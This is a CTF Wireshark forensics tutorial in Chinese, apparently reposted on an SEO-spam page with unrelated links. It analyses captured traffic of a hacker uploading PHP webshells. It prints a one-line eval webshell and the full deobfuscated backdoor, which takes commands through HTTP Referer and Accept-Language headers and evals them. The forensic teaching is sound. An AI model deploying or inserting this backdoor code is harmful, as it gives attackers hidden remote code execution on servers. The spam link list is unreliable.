当前位置: 首页 > news >正文

seo教学视频教程新余seo

seo教学视频教程,新余seo,微信人工客服电话95188对吗,怎么做兼职类网站目录 1.基本介绍 2.基本使用 1)数据包筛选: 2)筛选ip: 3)数据包还原 4)数据提取 3.wireshark实例 1.基本介绍 在CTF比赛中,对于流量包的分析取证是一种十分重要的题型。通常这类题目都是会提供一个包含…

目录

1.基本介绍

2.基本使用

1)数据包筛选:

2)筛选ip:

3)数据包还原

 4)数据提取

 3.wireshark实例


1.基本介绍

在CTF比赛中,对于流量包的分析取证是一种十分重要的题型。通常这类题目都是会提供一个包含流量数据的pcap文件,参赛选手通过该文件筛选和过滤其中无关的流量信息,根据关键流量信息找出flag或者相关线索。

pcap流量包的分析通常都是通过图形化的网络嗅探器——wireshark进行的,这款嗅探器经过众多开发者的不断完善,现在已经成为使用最为广泛的安全工具之一。接下来,斗哥来为大家讲解这款工具的基本使用。

 

2.基本使用

Wireshark的基本使用分为数据包筛选、数据包搜索、数据包还原、数据提取四个部分。

1)数据包筛选:

数据包筛选功能是wireshark的核心功能,比如需要筛选出特定的协议如HTTP,Telnet等,也可能需要筛选出ip地址,端口等。

2)筛选ip:

●源ip筛选

输入命令:ip.src == 地址

3)数据包还原

在wireshark中,存在一个交追踪流的功能,可以将HTTP或TCP流量集合在一起并还原成原始数据,具体操作方式如下:

选中想要还原的流量包,右键选中,选择追踪流 – TCP流/UPD流/SSL流/HTTP流。

 可在弹出的窗口中看到被还原的流量信息

 4)数据提取

Wireshark支持提取通过http传输(上传/下载)的文件内容,方法如下:

菜刀下载文件的流量,需要删除分组字节流前开头和结尾的X@Y字符,否则下载的文件会出错。鼠标右键点击 – 选中 显示分组字节…

 在弹出的窗口中设置开始和结束的字节(原字节数开头加3,结尾减3)

 最后点击save as按钮导出。

导出结果:

 

 3.wireshark实例

题目要求:

1.黑客第一次获得的php木马的密码是什么

2.黑客第二次上传php木马是什么时间

3.第二次上传的木马通过HTTP协议中的哪个头传递数据

题目要求php木马的密码,首先我们要知道php一句话木马一般都是POST请求

所以我们直接过滤POST请求,发现这个IP请求了一个名为kkkaaa.php的php文件,很可疑

正常文件不会以此命名的, 打开数据包看一下,发现了这个字段

Form item: "zzz" = "@eval(base64_decode($_POST[z0]));"

 

上传的木马应该是:<?php eval($_POST['zzz']);?>

又将eval(base64_decode($_POST[z0]));传入zzz参数,目的是将z0传入的数据进行base64的解码此时z0传入base64编码后的数据,便可以执行恶意代码解码后发现执行了dirname函数,目的是查看当前路径下的文件或目录,类似linux下的ls命令

PHP代码是通过混淆过的,让我们根本看不懂他的代码

 还原后的代码:

<?php
$kh = "cb42";
$kf = "e130";
function x($t, $k)
{$c = strlen($k);$l = strlen($t);$o = "";for ($i = 0; $i < $l;) {for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {$o .= $t{$i} ^ $k{$j};}}return $o;
}$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {$u = parse_url($rr);parse_str($u["query"], $q);$q = array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);if ($q && $m) {@session_start();$s =& $_SESSION;$ss = "substr";$sl = "strtolower";$i = $m[1][0] . $m[1][4];$h = $sl($ss(md5($i . $kh), 0, 3));$f = $sl($ss(md5($i . $kf), 0, 3));$p = "";for ($z = 1; $z < count($m[1]); $z++) $p .= $q[$m[2][$z]];if (strpos($p, $h) === 0) {$s[$i] = "";$p = $ss($p, 3);}if (array_key_exists($i, $s)) {$s[$i] .= $p;$e = strpos($s[$i], $f);if ($e) {$k = $kh . $kf;ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), $ss($s[$i], 0, $e))), $k)));$o = ob_get_contents();ob_end_clean();$d = base64_encode(x(gzcompress($o), $k));print("<$k>$d</$k>");@session_destroy();}}}
}
?>

 这个函数在8.0已经被移除,并且和eval()函数有同样的安全隐患

 木马要利用,就必然会与数据包进行交互,仔细看看这两行代码

 

$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];

获取http请求中的referer和accept_language字段的,与数据包产生了交互,所以可以基本断定这两个字段是黑客用来传输他想执行的命令的.我们随便看一个访问footer.php的包

 所以木马通过HTTP协议中的referer头传递数据

http://www.dt0577.cn/news/32163.html

相关文章:

  • 绵阳模板网站中国教师教育培训网
  • 网站备案幕布照片怎么算合格sem代运营
  • 贵阳好的网站建设公司360网站推广客服电话
  • 网站优化图片链接怎么做班级优化大师的功能
  • 可以免费看日本黄片的app做网站重庆seo网络推广优化
  • 新乡商城网站建设哪家优惠外贸网站搭建
  • 越秀企业网站建设百度指数app官方下载
  • 卡一卡二卡四卡视频免费观看seo流量排行榜神器
  • 网站建设费用归类公司网页制作教程
  • 办公家具网站模板注册网站怎么注册
  • 大连建设工程信息网下载中心seo外包上海
  • 做任务挣钱的网站聚网页模板代码
  • 网站建设论文模板网络营销策略实施的步骤
  • 房产网站怎么做国外seo比较好的博客网站
  • 东莞网站推广多少钱网络营销策略的特点
  • 网站建站推广制作网站的平台
  • 怎么创建网站域名百度游戏
  • windows 2003做网站青岛招聘seo
  • 网站如何做seo的北京建站
  • 宁波网站制作公司哪家好东莞好的网站国外站建设价格
  • 室内设计和网站建设哪个前景好西安seo工作室
  • 多光营销软件网站整合营销传播理论
  • 网站建设推广公司排名百度搜索风云榜排名
  • 帮一个公司做网站多少钱百度网盘登录入口
  • 苏州做网站的公司免费建站系统
  • 网站服务器购买南昌网站seo外包服务
  • 网站开发要加班吗网站关键词seo优化公司
  • 上海企业建站 免费网络优化工程师前景
  • 外贸门户网站泰安网站建设优化
  • 不得建设基层政府网站加盟教育培训哪个好